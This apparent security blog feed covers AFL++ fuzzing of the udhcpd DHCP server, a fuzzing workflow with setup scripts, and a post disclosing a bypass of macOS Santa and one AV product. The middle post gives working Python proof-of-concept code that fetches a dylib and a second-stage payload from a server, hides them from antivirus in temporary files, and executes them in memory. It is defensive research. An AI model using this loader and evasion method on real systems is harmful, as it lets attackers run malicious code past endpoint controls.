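    FILE *fp;
    char outname[64];
    snprintf(outname, sizeof(outname), "./%s_%ld", type_prefix, (long) time(0));
    fp = fopen(outname, "wb");
    if (!fp) {
        perror("fopen");
        return -1;
    }
    /* packet is already a pointer to the struct; passing &packet here would
       write the pointer's own bytes instead of the message */
    int res = fwrite(packet, sizeof(struct dhcpMessage), 1, fp);
    printf("wrote packet data to file: '%s'\n", outname);
    fclose(fp);
    return res;
}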


With all of these pieces in place, I was able to replace almost all of the code from the original main() with calls to the custom packet functions that generate packets and then write the packet data to output files. Below is a snippet of some of the testcases I created:

    // normal discover packet
    struct dhcpMessage discover_1;
    printf("[+] creating testcase: discover 1\n");
    make_discover(&discover_1, random_xid(), requested_ip);
    write_packet_to_testcase_file(&discover_1, "discover_1");

    // discover with long vendor_id
    struct dhcpMessage discover_long_vendor;
    printf("[+] creating testcase: discover long\n");
    init_packet_long_vendor_str(&discover_long_vendor, DHCPDISCOVER, 255);
    write_packet_to_testcase_file(&discover_long_vendor, "discover_long");

    // discover with tweaked vendor_id
    struct dhcpMessage discover_mut;
    printf("[+] creating testcase: discover custom vendor\n");
    make_discover(&discover_mut, random_xid(), requested_ip);
    add_custom_vendor_id(&discover_mut, "AAAAAAAAAAAAAAAA", 40);
    write_packet_to_testcase_file(&discover_mut, "discover_cvendor");


I created a modified Makefile from the original to only build the client components I needed and was able to successfully compile the application. I ran it and it produced valid testcase files that I could feed to the harness.
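
One cheap way to double-check that generated files really contain a dhcpMessage is to look at their size and at the magic cookie. The sketch below is illustrative only: check_testcase() is a hypothetical helper, and the size (548 bytes) and cookie offset (236) are assumptions based on my reading of the struct layout rather than values taken from the generator.

```python
import tempfile
from pathlib import Path

DHCP_MESSAGE_SIZE = 548                    # assumed sizeof(struct dhcpMessage)
COOKIE_OFFSET = 236                        # assumed offset of the cookie field
DHCP_MAGIC = bytes.fromhex("63825363")     # cookie as it appears on the wire


def check_testcase(path):
    """Return a list of problems found in one testcase file (empty if none)."""
    data = path.read_bytes()
    problems = []
    if len(data) != DHCP_MESSAGE_SIZE:
        problems.append(f"unexpected size {len(data)}")
    if data[COOKIE_OFFSET:COOKIE_OFFSET + 4] != DHCP_MAGIC:
        problems.append("magic cookie missing")
    return problems


# Demo on two throwaway files: one well-formed, one obviously truncated.
with tempfile.TemporaryDirectory() as tmp:
    good = Path(tmp) / "discover_ok"
    good.write_bytes(bytes(COOKIE_OFFSET) + DHCP_MAGIC + bytes(308))
    bad = Path(tmp) / "discover_bad"
    bad.write_bytes(bytes(16))
    good_problems = check_testcase(good)
    bad_problems = check_testcase(bad)

print(good_problems, bad_problems)
```

A file with the right size but no cookie is a hint that the wrong buffer was written to disk, which is easy to miss because AFL will happily mutate garbage seeds too.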

Note: Testcases Should Be Generated on the Fuzzing Node

One consequence of this approach is that the testcase files need to be generated on the same host where the fuzz job will run. The generator reads from the configured network interface and uses it to determine which IP and MAC addresses go into the packets it creates. While this likely doesn’t matter for the harness (since it won’t be sending packets, checking leases, doing ARP pings, etc.), any crashes or interesting outputs will probably only be reproducible against a vanilla udhcpd running with a compatible configuration on the same host where the testcases were generated, since that code will perform those checks and attempt to send packets. So, to keep things as consistent as possible, it’s best to do everything on the same machine.

This means that, ideally, the testcase generator should be configured to use one network interface while the harness/vanilla server uses another on the same host. This should ensure that when trying to reproduce issues the packets will appear to be coming from a MAC address that the server can know about/reach and that values will be compatible with the network configuration.




Resolving Issues

ARP Ping Timeouts

I was initially able to run afl-fuzz and get a job running, but eventually noticed that I had made a typo in the config file where I defined the starting address of the server’s lease range. The typo resulted in an invalid IP address (1011.13.13.50), which I had missed since I couldn’t see output from the binary when running it under AFL.
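
Since the target's output is hidden while it runs under AFL, a quick pre-flight check of the config file can catch this kind of typo before a job is started. Below is a small sketch using Python's ipaddress module. It assumes the usual udhcpd.conf style of "keyword value" lines with start and end options; the invalid_addresses() helper and the sample file contents (other than the mistyped address) are made up for illustration.

```python
import ipaddress


def invalid_addresses(config_text, keys=("start", "end")):
    """Return (line_number, key, value) for address options that fail to parse."""
    bad = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        fields = line.split("#", 1)[0].split()   # drop trailing comments
        if len(fields) >= 2 and fields[0] in keys:
            try:
                ipaddress.IPv4Address(fields[1])
            except ValueError:
                bad.append((lineno, fields[0], fields[1]))
    return bad


# Hypothetical config contents; only the mistyped start address comes from the post.
sample = """\
# test-udhcpd.conf (illustrative)
start 1011.13.13.50
end   10.13.13.100
interface eth0
"""

bad = invalid_addresses(sample)
print(bad)
```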

After fixing the typo and adding a valid address, I immediately ran into timeout issues when trying to run afl-fuzz again. A bit of troubleshooting later, I was able to isolate the timeouts as being caused by the following call chain:


  [sendOffer() → find_address() → check_ip() → arpping()]


This code path is taken when sending a DHCP offer to the client in order to find an IP within the lease range and check whether it is on the network. It does so by sending an ARP ping to the potential address — this was causing the timeouts as there were no hosts that would respond to this ARP message and the server was waiting for a response. Since there was no need to actually have the server send the packet, I modified find_address to return the IP it picks before it calls check_ip().

Preventing Response Packets

Another bit of code I thought was likely to slow things down and that wasn’t really needed was the networking code responsible for sending responses to clients. Since there would be no real network clients to receive the packets and I wasn’t interested in fuzzing the underlying network stack, I made the following changes to preserve as much code as possible while eliminating the actual network access:


  remove the socket binding code from packet.c:raw_packet() and have it return before sending the packet
  remove the socket binding code from packet.c:kernel_packet() and have it return before sending the packet


This is a snippet of the code from raw_packet() showing where I removed the call to bind() and added an early return before the call to sendto() near the end of the function:

if ((fd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_IP))) < 0) {
		DEBUG(LOG_ERR, "socket call failed: %s", strerror(errno));
		return -1;
	}
	
	memset(&dest, 0, sizeof(dest));
	memset(&packet, 0, sizeof(packet));
	
	dest.sll_family = AF_PACKET;
	dest.sll_protocol = htons(ETH_P_IP);
	dest.sll_ifindex = ifindex;
	dest.sll_halen = 6;
	memcpy(dest.sll_addr, dest_arp, 6);
	
	// < -- removed call to bind() -- > 

	packet.ip.protocol = IPPROTO_UDP;
	packet.ip.saddr = source_ip;
	packet.ip.daddr = dest_ip;
	packet.udp.source = htons(source_port);
	packet.udp.dest = htons(dest_port);
	packet.udp.len = htons(sizeof(packet.udp) + sizeof(struct dhcpMessage)); /* cheat on the psuedo-header */
	packet.ip.tot_len = packet.udp.len;
	memcpy(&(packet.data), payload, sizeof(struct dhcpMessage));
	packet.udp.check = checksum(&packet, sizeof(struct udp_dhcp_packet));
	
	packet.ip.tot_len = htons(sizeof(struct udp_dhcp_packet));
	packet.ip.ihl = sizeof(packet.ip) >> 2;
	packet.ip.version = IPVERSION;
	packet.ip.ttl = IPDEFTTL;
	packet.ip.check = checksum(&(packet.ip), sizeof(packet.ip));

	// RETURN BEFORE CALLING sendto()
	close(fd);
	return 1;

	result = sendto(fd, &packet, sizeof(struct udp_dhcp_packet), 0, (struct sockaddr *) &dest, sizeof(dest));
	if (result <= 0) {
		DEBUG(LOG_ERR, "write on socket failed: %s", strerror(errno));
	}




Fuzzing!

With all of the important pieces complete, it was time to put it all together and start fuzzing! All of the commands below were run from within the AFL++ docker container.

Compiling the Testcase Generator & Creating the Corpus

After dropping to a shell in the container, I changed to the source directory for the testcase generator and ran make using the custom Makefile I created. This produced the binary mk-testcases, which I then executed to generate the testcase files.

-> % sudo docker run --security-opt seccomp=unconfined -ti -v $PWD:/src aflplusplus/aflplusplus
[afl++ dda3efae1cdf] $ cd /src/corpus-gen/src/
[afl++ dda3efae1cdf] /src/corpus-gen/src/ $ make
gcc -c -DSYSLOG -W -Wall -Wstrict-prototypes -DVERSION='"0.9.8"' -g -DDEBUG dhcpc.c
dhcpc.c: In function 'main':
dhcpc.c:256:35: warning: pointer targets in passing argument 1 of 'strncpy' differ in signedness [-Wpointer-sign]
<--- SNIP --->
gcc  mk-testcases.o clientpacket.o script.o options.o socket.o packet.o pidfile.o -o mk-testcases

# Create the corpus using mk-testcases
[afl++ dda3efae1cdf] /src/corpus-gen/src/ $ mkdir corpus && cp mk-testcases corpus/
[afl++ dda3efae1cdf] /src/corpus-gen/src/ $ cd corpus/
[afl++ dda3efae1cdf] /src/corpus-gen/src/corpus $ ./mk-testcases && rm mk-testcases
adapter index 33
adapter hardware address 02:42:ac:11:00:02
[+] creating testcase: discover 1
<--- SNIP --->
[afl++ dda3efae1cdf] $ ls
discover_1_1654463092  discover_cvendor_1654463092  request_1654463092            request_cid_mod4_1654463092
discover_2_1654463092  discover_long_1654463092     request_cid_mod32_1654463092


Compiling the Harness

In the same shell session, I then changed over to the harness source directory and ran make there to produce the udhcpd-harness binary.

# Building the harness
[afl++ dda3efae1cdf] $ cd /src/harness1/src
[afl++ dda3efae1cdf] /src/harness1/src $ CC=afl-clang-fast make
afl-clang-fast -c -DSYSLOG -static -W -Wall -Wstrict-prototypes -DVERSION='"0.9.8"' -g -DDEBUG dhcpd.c
afl-cc++4.01a by Michal Zalewski, Laszlo Szekeres, Marc Heuse - mode: LLVM-PCGUARD
SanitizerCoveragePCGUARD++4.01a
[+] Instrumented 54 locations with no collisions (non-hardened mode) of which are 1 handled and 0 unhandled selects.
afl-clang-fast -c -DSYSLOG -static -W -Wall -Wstrict-prototypes -DVERSION='"0.9.8"' -g -DDEBUG arpping.c
<--- SNIP --->
afl-clang-fast -static dhcpd-harness.o arpping.o files.o leases.o serverpacket.o options.o socket.o packet.o pidfile.o -o udhcpd-harness


Fuzzing

With that done, I put everything together in a single directory and got everything ready for the run.

# Create a directory for the fuzzing run
[afl++ dda3efae1cdf] $ cd /src
[afl++ dda3efae1cdf] /src $ mkdir -p fuzz_run/outputs
[afl++ dda3efae1cdf] /src $ mkdir -p fuzz_run/inputs

# Copy over the harness, generated corpus, and server config file
[afl++ dda3efae1cdf] /src $ cp harness1/src/udhcpd-harness fuzz_run/
[afl++ dda3efae1cdf] /src $ cp corpus-gen/src/corpus/* fuzz_run/inputs/.
[afl++ dda3efae1cdf] /src $ cp harness1/test-udhcpd.conf fuzz_run/
[afl++ dda3efae1cdf] /src $ cd fuzz_run && ls
inputs  outputs  test-udhcpd.conf  udhcpd-harness

# start afl-fuzz
[afl++ dda3efae1cdf] /src/fuzz_run $ afl-fuzz -i inputs/ -o outputs/ -- ./udhcpd-harness


And it’s off!



Summary

Overall, this process was a great learning opportunity for concepts I’m hoping to be able to transfer over to larger/more complex codebases. Getting all of the pieces to work together was a challenge, and porting over the necessary code while removing the unnecessary code was tedious and required spending a lot of time tracing execution paths, but all of this proved to be useful in the end. I’m glad I was able to validate my idea of using existing server/client code to create a fuzzing harness and generate testcases, but I realize this approach probably becomes much more difficult with more complex targets.

I built a couple of copies of the harness using ASAN and some other features and spun up a few instances. As shown in the screenshot at the top of this post, eventually there were some crashes found in the ASAN versions. After some testing and creating another copy of the server code to use for reproducing crashes, I was only able to get an ASAN crash from one of those crash files. For now I haven’t dug into it much but may come back around with another post if anything interesting comes of it.

As you may be able to tell from this post, I’m far from being an expert at this stuff — in fact, quite the opposite. There may be some glaring issues with this approach and I haven’t spent enough time testing and validating everything to be completely sure I’m not doing something very wrong, so please don’t take anything I say here as coming from a source of expertise. But please do let me know about it :)

References


  Github repo for the harness+testcase generator
  AFL++ persistent mode
  udhcpd Source



osx naughtiness: bypassing santa & hiding from av
2019-01-08T00:00:00+00:00
I recently audited Santa, a binary authorization system for macOS, and discovered a technique for bypassing Santa’s controls using in-memory execution + userland-exec. I combine this with Python’s ctypes module and NamedTemporaryFile objects to create a proof-of-concept showing how this can be used to execute native code in a ‘fileless’ manner and bypass both Santa and at least one popular enterprise AV solution on macOS.

Introduction
I recently became aware of Santa, an open source binary authorization system for macOS created by Google (though not an official Google product). I was interested in its design and wanted to try to find a way to bypass its controls. I turned out to be successful and even found an interesting way to download “known bad” files without alerting a popular antivirus solution.

The code shown below can be found here.

Santa

From the Santa Github page:


  Santa is a binary authorization system for macOS. It consists of a kernel extension that monitors for executions, a userland daemon that makes execution decisions based on the contents of a SQLite database, a GUI agent that notifies the user in case of a block decision and a command-line utility for managing the system and synchronizing the database with a server.


Santa is designed to restrict the execution of unauthorized Mach-O binary executables. Specifically, it intercepts calls to execve* in the kernel and uses filesystem metadata (filesystem id, unique file id) to identify the file being executed on the filesystem. Allowlist and blocklist rules are defined using either a SHA256 hash, signing certificate hash, or file path.

The Github page also has the following under the “Known Issues” section:


  Santa only blocks execution (execve and variants), it doesn’t protect against dynamic libraries loaded with dlopen, libraries on disk that have been replaced, or libraries loaded using DYLD_INSERT_LIBRARIES.


So, the team that develops Santa acknowledges that the tool does not protect against these common library-based techniques. In any case, I wanted to find a way to execute arbitrary binaries using a different kind of technique, one without the limitations of the most common library injection attacks and without Santa detecting it.

Limitations of Common Injection Techniques on OSX

Dynamic library injection typically depends on the presence of binaries that are vulnerable to injection. Previously, attackers could depend on default macOS binaries that were vulnerable to the injection techniques described above, but SIP now prevents the use of DYLD_INSERT_LIBRARIES and similar flags for Apple binaries.

Attackers must also:


  Match version numbers between legit and injected library (dyld checks for matching versions)
  Export the necessary symbols from the legit library to be used by the injected version


Finally, use of DYLD_INSERT_LIBRARIES is a well-known technique, and when used on the command line it is easy to detect.

Cutting Out the Middle Man

What if we could load a dylib without the need for a vulnerable application to inject it into or any of the other limitations? We can accomplish this using Python’s ctypes module to load the library and call its functions from within Python. Pretty simple!

Here is a simple example to show this in action. This is the C code that is built as a shared library:

    #include <stdio.h>
    int main(void) {
        printf("Hello, from within Python\n");
    }


And here is the Python code that loads the library and calls the main() function:

    #!/usr/bin/python2.7
    import ctypes
    if '__main__' == __name__:
      mylib = ctypes.cdll.LoadLibrary("lib.dylib")
      mylib.main()


At this point we are able to execute code without the need for injectable binaries and Santa cannot detect it, but this is expected based on Santa’s known issues. Let’s take it a step further and use the shared library to execute Mach-O binaries in memory.

Bypassing Santa via In-Memory Execution

Executing binaries from memory and ‘userland exec’-style attacks are not new techniques, but there is little research specific to the macOS platform. The most informative for my own research was the work done by Stephanie Archibald on behalf of Cylance in 2017 [3].

In this work, Stephanie describes the process of locating dyld in the memory space of the executing binary and using knowledge of existing structures and functionality to resolve the symbols necessary to load and execute a file image from memory. With these symbols resolved, it was then possible to load the target binary from disk and execute it from memory.

Specifically, the technique for loading and executing a binary from memory on MacOS involves the use of two deprecated methods in dyld, NSCreateObjectFileImageFromMemory and NSLinkModule. The symbols for these two functions are the ones that are resolved using the techniques defined in Stephanie’s PoC code. For a more detailed description of this technique and the overall process of accomplishing this type of execution, see Stephanie’s excellent blog post linked in the References section.

Tweaking an Existing PoC to Make a New One

I first confirmed the PoC code worked using the instructions provided and then compiled the code as a dynamic library and attempted to load it into Python using the technique described in the preceding section. This caused errors where the code in Stephanie’s PoC could not locate the necessary symbols in the symbol table.

Stephanie’s code was intended to be compiled and executed directly; for this reason, it makes some assumptions regarding the address space of the process when trying to locate the symbols for NSCreateObjectFileImageFromMemory and NSLinkModule. After some debugging and experimentation, I realized I could actually reference these functions directly in the code that would then be used as the “launcher” library and there was no need to resolve the given symbols directly from dyld in memory*. This led to a dylib that could be loaded into Python and used to execute other binaries. The code can be found here.

Below is a snippet of Python that loads this new code and uses it to execute /bin/cp:

    import ctypes
    import sys
    if '__main__' == __name__:
      mylib = ctypes.cdll.LoadLibrary("rlm.dylib")
      mylib.launch("/bin/cp")


Output:
    $ python2 poc.py
    usage: cp [-R [-H | -L | -P]] [-fi | -n] [-apvXc] source_file target_file
           cp [-R [-H | -L | -P]] [-fi | -n] [-apvXc] source_file ... target_directory


Great! We’ve now successfully loaded and executed a binary from the target system using this technique and Santa has not detected this execution of /bin/cp. The preceding examples assume the loaded dylib is already on the victim’s system, but realistically, this would likely be downloaded from a remote server. That would look like this:

    import requests, ctypes
    if '__main__' == __name__:
      r = requests.get("http://localhost:8080/rlm.dylib")
      r.raise_for_status()
      f = open("/tmp/lib", "wb")
      f.write(bytes(r.content))
      f.seek(0)
      mylib = ctypes.cdll.LoadLibrary(f.name)
      mylib.launch("/bin/cp")


Cool…now let’s get stealthier.

Getting Stealthier: Bypassing AV

Okay, so we can execute a binary on the target host. Using the same technique used to download the dylib from a remote server above, an attacker can also download the binary payload.

But wait: saving files to disk leaves traces for investigators to find. Sure, we can delete the dylib and binary from disk when we’re done, but having to provide a path for the newly created files means tipping analysts off to where our payloads were written. What if the payload is likely to trigger AV alerts? Introducing Python’s NamedTemporaryFile objects.

detected by AV (using EICAR file)

    import requests
    if '__main__' == __name__:
      # get the EICAR test file from the remote server
      r = requests.get("http://2016.eicar.org/download/eicar.com")
      r.raise_for_status()
    
      f = open("/tmp/eicsar.com", "wb")
      f.write(bytes(r.content))
      f.seek(0)
      f.close()


not detected by AV (using EICAR file)

    import tempfile
    import requests
    
    if '__main__' == __name__:
      # get the EICAR test file from the remote server
      r = requests.get("http://2016.eicar.org/download/eicar.com")
      r.raise_for_status()
      # create a NamedTemporaryFile object to hold the downloaded file
      f = tempfile.NamedTemporaryFile(delete=True)
      f.write(bytes(r.content))
      f.seek(0)
      f.close()


Using this technique, I confirmed that I could go undetected by at least one popular enterprise AV solution when downloading this “known bad” file. I even went so far as to download the bad file to the same location where the tempfile names point to using standard Python file objects and confirmed that this did trigger an AV alert, indicating that the use of tempfile objects in particular led to AV’s inability to detect this bad file.
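
For readers who have not used NamedTemporaryFile before, the sketch below shows the lifecycle the PoC relies on: while the object is open the data is reachable through a real filesystem path (f.name), and with delete=True that path disappears as soon as the object is closed. It is written for Python 3 on a POSIX system, uses harmless placeholder bytes, and makes no claim about why any particular AV product does or does not inspect such files.

```python
import os
import tempfile

f = tempfile.NamedTemporaryFile(delete=True)
f.write(b"placeholder payload bytes")
f.flush()                            # make sure the bytes are visible via f.name

path = f.name
exists_while_open = os.path.exists(path)
with open(path, "rb") as reader:     # a second handle can open it by name (POSIX)
    readback = reader.read()

f.close()                            # with delete=True the file is removed here
exists_after_close = os.path.exists(path)

print(path, exists_while_open, exists_after_close)
```

This is why the PoC can hand f.name to ctypes while the object is still open, and why nothing is left at that path afterwards.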

This means that all an attacker has to do is handle all executions of binary payloads in this manner and they have made it more difficult to detect both the presence and execution of malicious code. Short-lived files also increase the difficulty of analysis. Use encrypted binaries and things become even more complicated.

A Final PoC - Putting It All Together

    import ctypes
    import tempfile
    import requests

    if '__main__' == __name__:
      # get the dylib from remote server
      r = requests.get("http://localhost:8080/rlm.dylib")
      r.raise_for_status()
    
      # create a NamedTemporaryFile object to hold the dylib
      f = tempfile.NamedTemporaryFile(delete=True)
      f.write(bytes(r.content))
      f.seek(0)
    
      # get the second-stage binary payload from the server
      r = requests.get("http://localhost:8080/t1")
      r.raise_for_status()
    
      # create a NamedTemporaryFile object to hold the binary
      b = tempfile.NamedTemporaryFile(delete=True)
      b.write(bytes(r.content))
      b.seek(0)
    
      # load the dylib from the tempfile and execute
      mylib = ctypes.cdll.LoadLibrary(f.name)
      mylib.launch(b.name)


Output
$ python2 poc_full.py
Hello, world!! I hope Santa doesn't catch me being naughty!


Conclusion

Put together, the techniques described here were effective at bypassing Santa and went undetected by one enterprise AV solution. This is not incredibly sophisticated, in my opinion, but it highlights the importance of layered defenses and thinking creatively about where gaps in coverage exist in the security controls we depend on.

I wasn’t able to do testing across other application allowlisting or AV solutions for MacOS so I encourage as many people as possible to test this against your AV (using poc3_undetected.py) to see if it detects the EICAR file.

Resources


  1 - Writing Badass Malware For OSX, Patrick Wardle
  2 - DLL Hijacking on OSX, Patrick Wardle
  3 - Running Executables on macOS From Memory, Stephanie Archibald



afl 0x0: my fuzzing environments and workflow
2018-06-09T00:00:00+00:00
This will be the first in a series of posts about working with afl and documenting new things I learn about using it. I thought it would be good to start this off by describing my current fuzzing workflow and how I set everything up. This took me a little while to settle into so I’m hoping it’ll be useful to others just getting started.

Workflow
I’ll begin with a quick overview of my typical fuzzing workflow, which will mention the different systems and tools involved.

Local Build and Test Run
I begin working in a local Ubuntu Server VM. The system is configured automatically using a couple of scripts and has all the necessary tools installed. I like fuzzing packages from the Ubuntu repos, so I enable the source code repositories on this system. Once I’ve selected a target, I download the source files and build them with afl. This is where I figure out the exact build recipe that is needed for the particular package and catch any build issues. When everything is finally compiled and instrumented correctly, I create a recipe script so that I can easily reproduce the build if needed. Finally, I build a small test corpus and run a short fuzzing job to see how the binary reacts to it.

Cloud Fuzzing, Round 1
When I’m ready to do the real fuzzing, I copy the files to a cloud storage bucket, launch a new VM instance in the cloud and configure it using the same script used on the local VM, download the files to this new instance, and start fuzzing. This VM is provisioned with high CPU and memory to improve fuzzing performance. Multiple instances of afl are run to take advantage of these resources.
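
As an illustration of what running multiple instances involves, here is a small sketch that builds the afl-fuzz command lines for one master (-M) and several secondary (-S) instances sharing a single sync directory. The afl_commands() helper, the directory names, the fuzzer basename, and the target command are all placeholders chosen for the example, not the exact invocations I use.

```python
import shlex


def afl_commands(target_cmd, n_instances, basename="fuzzer",
                 in_dir="testcases", sync_dir="syncdir"):
    """Build one afl-fuzz command per instance: one -M master, the rest -S."""
    commands = []
    for i in range(1, n_instances + 1):
        role = "-M" if i == 1 else "-S"
        name = f"{basename}{i:02d}"
        commands.append(
            ["afl-fuzz", "-i", in_dir, "-o", sync_dir, role, name, "--"]
            + shlex.split(target_cmd)
        )
    return commands


# Hypothetical target that takes its input file as an argument (@@).
cmds = afl_commands("./target @@", 4)
for cmd in cmds:
    print(shlex.join(cmd))
```

Each command would typically be started in its own screen or tmux session, with the instance count matched to the number of cores available on the VM.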

After the fuzzers have run long enough (at least long enough for the master to have completed one cycle), I stop the jobs and prepare to consolidate and minimize the resulting testcase files in the queue/ directory of each fuzzer that ran in the job.

Testcase Corpus Consolidation and Minimization
The files in each fuzzer’s queue may contain other bugs that weren’t uncovered in the first run. There will probably be lots of overlap between these files, so I consolidate them into a single directory and run them through afl-cmin. This allows me to go for another round of fuzzing with these testcases if I think it’s worth it.

Once this is done, I delete the queues for each fuzzer and the directory that contained the combined queues to save space. I then create an archive of the target directory with the new files and upload them to the cloud storage bucket.
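
The consolidation step can be sketched in Python as follows. One thing to watch for when merging queues is that different fuzzers can produce files with identical names, so a plain copy into one directory may silently overwrite testcases. The consolidate_queues() helper below is hypothetical: it prefixes each file with its fuzzer's name and skips files whose contents have already been seen. The directory layout is an assumption modeled on afl's sync directory structure.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def consolidate_queues(sync_dir, out_dir):
    """Copy every fuzzer's queue files into out_dir, skipping duplicate contents."""
    out_dir.mkdir(parents=True, exist_ok=True)
    seen = set()
    copied = 0
    for queue in sorted(sync_dir.glob("*/queue")):
        fuzzer = queue.parent.name
        for case in sorted(queue.iterdir()):
            if not case.is_file():          # ignore subdirectories inside queue/
                continue
            digest = hashlib.sha256(case.read_bytes()).hexdigest()
            if digest in seen:
                continue
            seen.add(digest)
            # Prefix with the fuzzer name so same-named files do not clobber each other.
            shutil.copy2(case, out_dir / f"{fuzzer}_{case.name}")
            copied += 1
    return copied


# Demo with two fake fuzzer queues in a throwaway directory.
with tempfile.TemporaryDirectory() as tmp:
    sync = Path(tmp) / "syncdir"
    for fuzzer, payload in (("fuzzer01", b"AAAA"), ("fuzzer02", b"BBBB")):
        q = sync / fuzzer / "queue"
        q.mkdir(parents=True)
        (q / "id:000000,orig:seed").write_bytes(payload)     # same name, different data
        (q / "id:000001,orig:shared").write_bytes(b"same")   # identical in both queues
    copied = consolidate_queues(sync, sync / "combined_queue")
    names = sorted(p.name for p in (sync / "combined_queue").iterdir())

print(copied, names)
```

The combined directory can then be handed to afl-cmin as its input directory, which does the real coverage-based minimization.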

Cloud Fuzzing, Round N
If it feels like it may be fruitful, I’ll then replace the queues for each fuzzer with the minimized queue and go for another round of fuzzing. I do this as many times as I see fit, minimizing the queues and uploading the new files to the storage bucket for each run.

Crash Minimization and Triage
Once I’m satisfied with the fuzzing, I prepare to analyze the resulting crash files.

I download the archives for each fuzzing run to a cloud instance and perform a similar operation as above to minimize the crashing testcases for each fuzzing run (combining the crash directories of each fuzzer and running them through afl-cmin). This can potentially reduce thousands of crash files down to under a hundred. When this is complete, I upload these new files to the storage bucket and then download them to my local VM. I then move on to analyzing the crash files to determine the root cause of the crashes and potential exploitability.

This process is much too involved to go into in this post, but I do plan on writing a post as part of this series that will deep dive into my crash triage process.

Components
The setup described above consists of the following components:


  fuzzy-scripts: collection of scripts for initializing the environment and installing afl, as well as some utility scripts
  Local VM instance: used for initial building, instrumentation, and test fuzzing
  Cloud VM instance: used for longer fuzzing sessions once all of the parameters are figured out
  Cloud storage bucket: centralized storage location for fuzz job files


fuzzy-scripts
fuzzy-scripts is a collection of scripts I wrote to automate the installation of afl and configuration of the environment. Most of the work is done by two scripts, setup.sh and dbg-repos.sh. Both the local VM instance and cloud instance are configured using the same scripts to create mirror environments.

Another script included with fuzzy-scripts is init-target.sh, located in the tools/ directory. This script creates a directory under ~/targets for a new fuzzing target. Inside, it creates the directories for testcases and findings used during the fuzzing process. This script is meant to eliminate having to repeat those commands every time.

setup.sh
This script does most of the heavy lifting. It begins by installing necessary packages and dependencies:

# update sources and install dependencies
echo "[+] Installing dependencies and making config changes for afl..."
sudo apt-get update
sudo apt-get install -y clang-3.8 build-essential llvm-3.8-dev gnuplot-nox
sudo update-alternatives --install /usr/bin/clang clang `which clang-3.8` 1
sudo update-alternatives --install /usr/bin/clang++ clang++ `which clang++-3.8` 1
sudo update-alternatives --install /usr/bin/llvm-config llvm-config `which llvm-config-3.8` 1
sudo update-alternatives --install /usr/bin/llvm-symbolizer llvm-symbolizer `which llvm-symbolizer-3.8` 1


After this, it enables coredumps, followed by downloading and installing the standard afl tools, as well as afl-clang-fast and afl-clang-fast++:

# ensure system doesnt interfere with dumps (has to be repeated after reboots)
echo "[+] Enabling core dumps..."
echo core | sudo tee /proc/sys/kernel/core_pattern

# get and build afl
echo "[+] Installing American Fuzzy Lop..."
cd tools
wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
tar xvf afl-latest.tgz &> /dev/null
cd afl-2*
make
make -C llvm_mode
sudo make install
echo "Done!"
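
Because the core_pattern change does not survive a reboot, it can be worth checking it before starting a fuzz job. Below is a minimal sketch of such a check. The function name core_pattern_ok and its optional file argument are my own for illustration and are not part of fuzzy-scripts:

```shell
#!/usr/bin/env bash
# Hypothetical helper, not part of fuzzy-scripts.
# Returns 0 if core_pattern is a plain file pattern, 1 if it pipes crashes
# to an external handler (leading '|'), 2 if the file cannot be read.
core_pattern_ok() {
    # The path argument exists only so the check can be tried on a sample file.
    local pattern_file="${1:-/proc/sys/kernel/core_pattern}"
    local pattern
    pattern="$(cat "$pattern_file" 2>/dev/null)" || return 2
    case "$pattern" in
        '|'*) return 1 ;;   # piped to a handler such as apport
        *)    return 0 ;;   # plain pattern, e.g. "core"
    esac
}

if core_pattern_ok; then
    echo "[+] core_pattern looks fine"
else
    echo "[!] core_pattern is piped or unreadable; re-run the 'echo core | sudo tee ...' step"
fi
```

Running this after a reboot shows right away whether the setup step needs to be repeated.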


Finally, it installs gdb, pwndbg, and a few other useful tools in case they aren’t already present:

# other installs
echo "[+] Installing gdb and pwndbg..."
sudo apt-get install -y gdb 
git clone https://github.com/pwndbg/pwndbg.git
cd pwndbg 
./setup.sh
echo "Done!"

echo ""
echo "[+] Installing some other tools in case they aren't already..."
sudo apt-get install -y yasm vim git 
echo "Done!"
echo ""


dbg-repos.sh
This script configures the debug symbol (ddebs) repositories for Ubuntu. These repos contain debug symbols for most packages available through apt, which can be a huge help when triaging bugs later on.

echo "Adding debug symbol repos at file /etc/apt/sources.list.d/ddebs.list"
echo "deb http://ddebs.ubuntu.com $(lsb_release -cs) main restricted universe multiverse
deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse
deb http://ddebs.ubuntu.com $(lsb_release -cs)-proposed main restricted universe multiverse" | \
    sudo tee -a /etc/apt/sources.list.d/ddebs.list

echo "Importing signing key..."
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 428D7C01 C8CAB6595FDFF622

echo "Updating repos..."
sudo apt-get update


tools/cmin.sh
This script consolidates the testcases from each fuzzer’s queue into a single directory so that the corpus can be minimized with afl-cmin. The code is shown below:

#!/usr/bin/env bash

if [ "$#" -ne 1 ]; then
    echo "[!] usage: ./cmin.sh "
    echo ""
    echo "> the fuzzer basename is the name you assigned to your master and slave fuzzers, minus the number."
    echo "> the target command string passed to afl must be double-quoted "
    exit
fi

fuzzer_name=$1
cd syncdir
mkdir combined_queue
cp "${fuzzer_name}"*/queue/* combined_queue/
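
The listing above stops once the queues have been combined. The minimization step that follows could look roughly like the sketch below. This is not the original script: the run_cmin function, the minimized_queue output directory, and the AFL_CMIN override are assumptions made for illustration. Only the -i and -o options and the -- separator are standard afl-cmin usage.

```shell
#!/usr/bin/env bash
# Sketch of the minimization step (not the original cmin.sh).
# Assumes it is run from inside syncdir/, after combined_queue/ has been filled.
run_cmin() {
    local target_cmd="$1"                     # e.g. "./target @@", passed double-quoted
    local afl_cmin="${AFL_CMIN:-afl-cmin}"    # hypothetical override, handy for dry runs

    if [ -z "$target_cmd" ]; then
        echo "[!] usage: run_cmin \"<target command>\"" >&2
        return 1
    fi

    # $target_cmd is left unquoted on purpose so it splits into program + args.
    "$afl_cmin" -i combined_queue -o minimized_queue -- $target_cmd
}

# Example (hypothetical target path):
#   run_cmin "../src/target @@"
```

Passing the target command as a single quoted string matches the note in the usage message about double-quoting it.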


tools/init-target.sh
This is a simple convenience script that sets up the directory structure I use for each new target. It creates a new directory under ~/targets/ with the name provided. This directory contains three directories:


  src/: a place to keep the source code of the target program
  inputs/: the directory for testcase files fed to the fuzzer
  syncdir/: the directory where the fuzzers will output their results


This script also copies the cmin.sh script to the new target directory, since the minimization script expects to be run from this location.
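
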